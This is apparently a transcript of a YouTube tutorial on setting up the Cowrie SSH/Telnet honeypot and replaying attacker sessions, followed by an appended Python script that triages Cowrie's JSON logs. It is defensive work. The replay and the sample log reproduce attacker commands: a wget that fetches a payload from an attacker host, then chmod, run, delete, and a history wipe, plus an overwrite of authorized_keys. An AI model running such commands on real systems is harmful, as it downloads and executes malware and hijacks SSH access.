How to Hack the Hackers | Cowrie Honeypot

Captions
Hey, what's up YouTube, welcome back to Hacker 101. All right, so for tonight's video I'm going to teach you guys about a tool called Cowrie, an SSH/Telnet honeypot, which is a way we can hack the hacker. So what this tool does: it sets up a fake SSH server and a fake Telnet server, and any hackers that are out scanning the internet looking for vulnerable SSH or Telnet servers find this Cowrie honeypot server, and when they log in, Cowrie records everything they do: every command they type, every script they download, every executable they download, every payload. It records everything, so that way we have all the information on how the hacker was trying to hack our machine: where he may have his command and control, where his FTP server is, where he is serving up his files from. So we can find out a lot of information, even IP addresses of the hacker, that we could further investigate if we wanted to.

All right, so before we get started, let me load up my disclaimer. All right guys, as you know, on Hacker 101 all the demos I do, all the hacking that I do, I do on my own equipment. I own the equipment, I have permission, nothing illegal is happening here. I do not support any illegal activities, and you should always have permission before any hacking-related activities.

So with that being said, I'm going to load up Kali Linux just to SSH to my Ubuntu server, but you need to have an Ubuntu server or a Debian server that is out on the cloud. I use DigitalOcean; you can use DigitalOcean, Google Cloud, Linode, whichever you prefer, but you need to have a one gigabyte, one CPU, very small virtual private server, because the server needs to be on the internet, publicly accessible, for hackers to be able to hack it.

All right, so first thing, let's open up your browser, and I'm going to show you the Cowrie GitHub page. So type in "cowrie honeypot github" and it's the first link here. This program has been around for quite some time; I used it years ago and learned how to hack the hackers, find out what they're doing, and get a heads up, or maybe one step ahead of the hackers, and you can block them with your firewalls and whatnot.

So, the Cowrie GitHub page: "Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker." What that means is, with the Cowrie SSH honeypot, whenever the hacker hacks into the fake SSH server it records everything they do, like I said, so it's recording all their interactions. Okay, so you can read more about the application on their GitHub page, but the documentation is here. I'm going to scroll down to "how to install", and I'm just going to kind of minimize this and open up my terminal. All right, and I'm SSHed to my server out on DigitalOcean, my Ubuntu server.

So first thing we need to do: you need to do sudo su and become root, and do an apt update. Once you do an apt update, we're going to copy these packages right here; copy those, but don't hit enter yet. I have one more package, and I will put it in the description of the video, but install this package also: it's python3.10-venv, write it down, but install that package, that's needed. Then hit enter, then yes to install those. All right, once it installs, the dependencies are done. Then we're going to create a user for the Cowrie application so it's not running as root; I don't want it to run as root. Just in case this program is vulnerable, this user has no privilege. Let's hit OK, let that restart services, then I'm going to do a clear.

All right, so now let's create that user, copy this here, and you can give it a name; enter, enter, yes, that information is correct. And now we need to change to that user, so do sudo su - cowrie, become the cowrie user, and now we're going to do a git clone, so we're going to download the Cowrie application.

All right, so let's change into that cowrie directory, ls, there are the files. So now we need to set up the Python virtual environment, so we're going to do a pwd just to show you where we are, in the /home/cowrie/cowrie directory. One thing about this application is, man, they've got files under folders cowrie/cowrie, it's just kind of crazy, but all right. So let's just type in this command, copy this command, and we need to edit this command before you hit enter: you can just add python3 here to make this work, then hit enter, and that'll set up this virtual environment. Right now I need to activate this virtual environment, that way we can install the other requirements for Cowrie. So we activated that, and you can tell it's activated by this. Then we upgrade pip, which is the Python package installer/manager, and then we're going to install the software requirements, the packages for Cowrie, by copying this; this gets all the requirements. Okay, that'll be done in a second.

So the next thing we'll do, we're going to edit the configuration file, which is stored in the etc directory, and there's a file called cowrie.cfg.dist. So let's go to etc, and you see that file. We're going to copy that file and name it cowrie.cfg, because if you read through here you'll see both files are read at startup; this file takes precedence and this file does not get overwritten, and this file will get overwritten during an upgrade. So this is like a template file for you, so we'll copy it like that, ls, and now we're going to do nano, we're going to edit the cowrie config file, and we're going to change the hostname from this svr04. That looks kind of suspicious; any experienced hacker is going to know that looks kind of like a honeypot server name. So just name it whatever, ssh-server-02 or whatever you want to name it.

And then next we're going to do a Ctrl+W, because I'm going to search for telnet; I'm going to type left bracket, telnet, right bracket, [telnet], hit enter, and I just want to enable it by typing true, yes, save it, hit enter.

All right, so now we can start Cowrie, but before we start it, let's go to this next step. You see it where it says "listening on port 22 (optional)". This is an optional step. Now Cowrie listens on port 2222, right? Most hackers are scanning the internet for port 22, not 2222, and port 23 for Telnet, not 2223. So what we're going to do is tell our iptables, for any incoming requests on port 22, redirect to 2222. That way they'll connect to the Cowrie SSH server. So let's copy that, hit enter. Sorry, we've got to hit Ctrl+C, we're going to exit out of the cowrie user, because we've got to be root to do this. So that's there. All right, now we'll do the next one, just copy it, that's for Telnet, hit enter. Okay. All right, so now let's do sudo su - cowrie, get back to the cowrie user. There we go.

Okay, all right, so let's go back to where we can start the program, so let's go into the cowrie directory, ls. All right, so we're going to type in bin/cowrie start, just like that. All right, so that started the Cowrie program. I'll show you that it's running in the background; you see it's running in the background, right? So at this point, what you would do: this doesn't happen instantly, you've got to let this sit out online, and eventually hackers will find it, and they're going to log into the server, they're going to start trying to download their payloads, they're going to try to start hacking the server to get elevated privileges and whatnot. So this has to sit online for a while. So let this run, but in the meantime I'll show you how you can watch the log file. So let's do pwd, let's do ls, let's go cd /var, ls, cd log, ls, cd cowrie. What I'm talking about with the directories: they've got a lot of directories. And then ls, and you see cowrie.log. So you can do tail -f cowrie.log, and the -f is "follow", so what that means is we're going to open and read this file, and we're going to read it live, that way whenever it's being scanned we'll see it. If we do that, hit enter, and now we see it's "Ready", "accepting Telnet connections", "accepting SSH connections", and whenever the hacker tries to hack into the server you'll see it logged here.

All right, and like I said, this will take some time. So for the purpose of this video I have two Cowries; I have a second one that I created a day or so ago, and it's already been running and has had some activity on it. So I'll show you what this looks like on a server, and what you do next. All right, so leave your Cowrie server running. You can check it in an hour or two, you should start seeing some activity on the log file here, but after a little bit of time you should start finding that people have logged in, they started downloading files and whatnot.

So let me log on to the other server, and I have that here, and let's see what directory, so ls. All right, so this is my second Cowrie server that's already been running. So the first thing I want to do: let's do cd /var and then ls, and then, you know, we went to the log directory earlier, that's where the log files are, but we're going to the lib directory. So we'll do cd lib, ls, and then cd cowrie, ls, and you have downloads, this is where any files that get downloaded are stored, and then tty, this is where the recorded session goes: when the hacker logged into the server, Cowrie records that and puts it, as a recorded session, into a directory called tty. So we'll do cd tty and then we'll do ls -al, and you'll see I already have a few files here. To read these files, to replay these files, you've got to type out kind of a long command, but you'll type in python3, and you'll type in /home/cowrie, we're going back to the cowrie folders, and then the bin directory, and then it's playlog, that's the name of the program, and then you just type in, let's say, the first one.

What this is going to do when I hit enter: it's going to play back what the hacker was typing in at the command prompt. So if I hit enter... all right, and this one is me. I logged in to show you guys: I typed in whoami, and it's root; pwd, the working directory; and then I'm looking at the password file. So this is all a recorded session where I had logged in previously to demo this, and so you see I'm echoing "subscribe to Hacker 101 now". So you see it's recording the session, and you see I'm on the SSH server. And so now that's the end of it, it's finished; that just showed me a recorded session.

So if I do a clear and an ls -al, now let's look at another one, and I'll show you some real activity now. So we're going to type in playlog just like we did, and then we're going to look at the second file, and watch this one. Okay, so this hacker logged in, he changed directory to the current user's home directory, he did an rm -rf to remove the .ssh directory and recreated the .ssh directory, and then he inserted their SSH key into the .ssh directory, into authorized_keys. Essentially what they did is they replaced the SSH key; they took over the server, they got rid of the weak password, and now you've got to have this SSH key to log in. Well, that didn't work, because this is a honeypot.

Okay, so let's do a clear on that one on the screen and an ls -al, and then the last one; play this file, hit enter. Now this person, when he logged in, he ran the shell command and he ran a wget command, so now we have a file here. This is the server's IP address, this is our attacker's, our hacker's IP address, so now we can investigate. We can check this server out, we can block it so that they no longer have access to our server, but we have identified a hacker's IP address, and they're trying to download this file. So what is this file, this URL ending in /12? So they're using a web server, their IP 43.249.172.195 on port 888, and the file name is 12, and I've got one named 12 as well. So they downloaded the file, they ran the file, and then they deleted the file, and then they cleared their history. So these are the commands they ran.

So if I run this command, do a wget... all right, so let me type in wget. If I run this command right here, I can download that file that they were downloading. This is the file that this hacker was downloading, and I'll show you, Cowrie's already downloaded this, but I'm going to show you. And this is another reason why you want to set up a honeypot on a server that's not on your network: you're playing around with payloads and different files that could possibly cause you issues. So if we just do a cat, all right, so this is an ELF; let's call it an ELF file. ELF is short for Executable and Linkable Format, that's an executable file for Linux. So you can do clear, and let's do ls, so we've got the 12 file. So if I wanted to decrypt or decompile this Linux executable file to dig in and get more information, I could do that by typing file, and it would tell me what type it is: it's an ELF file, 32-bit, blah blah blah. And if I typed in strings 12, I can start getting information out of this payload, and I can decompile this payload and see exactly what it does, but that's for another video. So I'm going to hit clear on this, and I'm not going to download the other file, because I want to show you in the downloads directory what it was.

So you saw where Cowrie recorded a hacker: it logged in, and he downloaded some files, he ran them on the server hoping to exploit my honeypot server, but it's not an actual shell, so he or she wasn't successful in their hack. All right, so let's do this: let's go cd .., ls, let's go to downloads, ls, and I'm going to do a cat on the first file, the one starting with 7. This is the file that he downloaded, and it is a script: they're looking for certain chipsets like arm7, arm4, arm6, arm5 and so forth. They're looking for certain chipsets, certain types of computers they're hacking, and here is their server's IP address, and here is another server's IP address that we could go and investigate. This is another hacker's machine, and they're trying to download their payloads with this script. So let's look at the other one. It is, I think, the SSH key; yeah, that's the SSH key that was downloaded by that one hacker, and he nicknamed it. So whatever, man, because you just hacked a honeypot server.

But we found out quite a bit of information: we found out how hackers are logging into our machine, how they're downloading their executable files. We downloaded that one Linux executable ELF file that we can decompile and possibly find their command and control. We did find the IP address of their server that's hosting their payloads; we could then run an nmap scan on those servers to see what we find. But this is a way you can hack the hackers back: we know what they're doing, we can see what they're trying, how they're trying to get into our systems, and we can use that information to help secure our environment. So I hope you enjoyed the video. It's kind of a long video, but if you have any questions about this setup, leave comments, and if you like the video, hit subscribe, and I will create you guys another video. All right, thanks.
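The video replays sessions one at a time with playlog and reads cowrie.log by eye. As an added example (not code from the video or from the Cowrie project), here is a small Python triage script for the step that comes after the honeypot has collected a day of traffic. It works on cowrie.json, the line-delimited JSON event log that Cowrie writes next to cowrie.log, and pulls out per session what the video digs for by hand: the attacker IP, the credentials that got them in, every command typed, the URLs those commands fetch (the payload hosts to investigate and block upstream), and whether the session wrote to authorized_keys like the SSH-key takeover in the replay. The sample log lines are constructed, with a made-up session ID and RFC 5737 documentation addresses; the field names (eventid, session, src_ip, input, url) are assumed to match Cowrie's JSON output, so check them against your own cowrie.json before relying on the script.

```python
"""Offline triage of Cowrie's line-delimited JSON event log (cowrie.json).

Added example: groups events by session and reports the attacker IP, the
credentials used, the commands typed, the URLs fetched, and any
authorized_keys persistence attempt. Not part of the Cowrie project.
"""
import json
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: one SSH session in Cowrie's cowrie.json line format.
# Session ID, timestamps and addresses (RFC 5737 ranges) are made up; the
# field names are assumed to match Cowrie's output.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51234,"dst_ip":"10.0.0.5","dst_port":2222,"session":"a1b2c3d4e5f6","protocol":"ssh","timestamp":"2023-08-09T01:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2023-08-09T01:00:01.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2023-08-09T01:00:02.000000Z"}
{"eventid":"cowrie.command.input","input":"cd ~; rm -rf .ssh; mkdir .ssh; echo \\"ssh-rsa AAAAB3NzaC1yc2E attacker-key\\" > .ssh/authorized_keys","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2023-08-09T01:00:03.000000Z"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://198.51.100.23:888/12; chmod +x 12; ./12; rm -rf 12; history -c","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2023-08-09T01:00:04.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://198.51.100.23:888/12","outfile":"var/lib/cowrie/downloads/0000constructed","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2023-08-09T01:00:05.000000Z"}
{"eventid":"cowrie.session.closed","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","duration":5.2,"timestamp":"2023-08-09T01:00:06.000000Z"}
"""

# URLs as they appear inside typed shell commands; stop at shell separators.
URL_RE = re.compile(r"""(?:https?|ftp|tftp)://[^\s;|&"'<>]+""")
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}


def parse_events(text):
    """Parse cowrie.json lines; skip torn lines (tail -f can hand you one)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def new_session():
    return {"src_ip": None, "failed": [], "success": None, "commands": [], "urls": set()}


def summarize_sessions(events):
    """Group events by Cowrie session ID and keep the fields worth triaging."""
    sessions = defaultdict(new_session)
    for ev in events:
        sid = ev.get("session")
        if not sid:
            continue
        s = sessions[sid]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid")
        if eid == "cowrie.login.failed":
            s["failed"].append((ev["username"], ev["password"]))
        elif eid == "cowrie.login.success":
            s["success"] = (ev["username"], ev["password"])
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
            s["urls"].update(URL_RE.findall(ev["input"]))
        elif eid == "cowrie.session.file_download" and ev.get("url"):
            s["urls"].add(ev["url"])
    return dict(sessions)


def payload_hosts(summary):
    """(host, port) pairs serving payloads: the servers to investigate, not the honeypot."""
    hosts = set()
    for s in summary.values():
        for url in s["urls"]:
            u = urlparse(url)
            if u.hostname:
                hosts.add((u.hostname, u.port or DEFAULT_PORTS.get(u.scheme, 0)))
    return hosts


def persistence_sessions(summary):
    """Sessions that wrote to authorized_keys (the SSH-key takeover from the replay)."""
    return {sid for sid, s in summary.items()
            if any("authorized_keys" in c for c in s["commands"])}


def attacker_ips(summary):
    return {s["src_ip"] for s in summary.values() if s["src_ip"]}


def report(text):
    """Human-readable triage of a cowrie.json dump."""
    summary = summarize_sessions(parse_events(text))
    persist = persistence_sessions(summary)
    lines = []
    for sid, s in summary.items():
        lines.append(f"session {sid} from {s['src_ip']}")
        lines.append(f"  failed logins: {len(s['failed'])}, success: {s['success']}")
        lines.extend(f"  cmd: {cmd}" for cmd in s["commands"])
        lines.extend(f"  fetch: {url}" for url in sorted(s["urls"]))
        if sid in persist:
            lines.append("  !! authorized_keys written (persistence attempt)")
    hosts = ", ".join(f"{h}:{p}" for h, p in sorted(payload_hosts(summary)))
    lines.append(f"payload hosts to investigate: {hosts}")
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    # Pipe a real log in (python3 triage.py < var/log/cowrie/cowrie.json),
    # or run with no input to see the constructed sample.
    print(report(SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read()))
```

Run it on the honeypot itself only against the log; the payload hosts it lists are where the wget in the replay pointed, and like the video says, fetching those samples belongs on a disposable box, not on your own network.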
Info
Channel: Hacker 101
Views: 4,060
Id: m7ZmwjyhzHU
Length: 21min 20sec (1280 seconds)
Published: Wed Aug 09 2023